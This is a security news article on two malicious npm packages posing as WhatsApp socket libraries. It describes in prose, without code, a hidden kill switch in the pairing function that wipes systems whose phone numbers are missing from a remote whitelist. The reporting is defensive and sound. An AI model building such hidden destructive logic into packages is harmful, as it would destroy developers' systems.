WhatsApp developers are facing threats from malicious npm packages that come with a remote kill switch.

Two malicious npm packages, identified as Naya-Flore and Nvlore-Hsc, have emerged as sophisticated threats targeting WhatsApp developers through a remote-controlled destruction mechanism capable of wiping development systems entirely. These packages masquerade as legitimate WhatsApp socket libraries while harbouring a devastating kill switch that can execute system-wide file deletion with a single command. Published by npm user Nayflore, using the email address idzzcch@gmail.com, these weaponised packages have garnered over 1,110 downloads within a month, showcasing their effectiveness in infiltrating developer workflows. The malicious libraries exploit the expanding WhatsApp Business API ecosystem, which serves over 200 million businesses globally, creating an attractive target environment where developers frequently install third-party packages for chatbot development, customer service automation, and messaging integrations.

Researchers from Socket.dev have identified a sophisticated attack mechanism embedded within what appears to be standard WhatsApp integration functionality. The malicious code specifically targets the RequestPairingCode function, a legitimate component invoked during WhatsApp bot authentication setup. Upon execution, the malicious code retrieves a remote database of whitelisted phone numbers from a GitHub repository using Base64 obfuscation. The attack logic operates through a deceptively simple mechanism within the RequestPairingCode function. If a developer’s phone number is found in the remote whitelist, the package continues normal operation. However, for any unlisted phone numbers, the system triggers a destructive payload that can wipe the entire system. This selective targeting approach allows threat actors to maintain operational security while executing their malicious intent, representing a significant evolution in supply chain attack sophistication.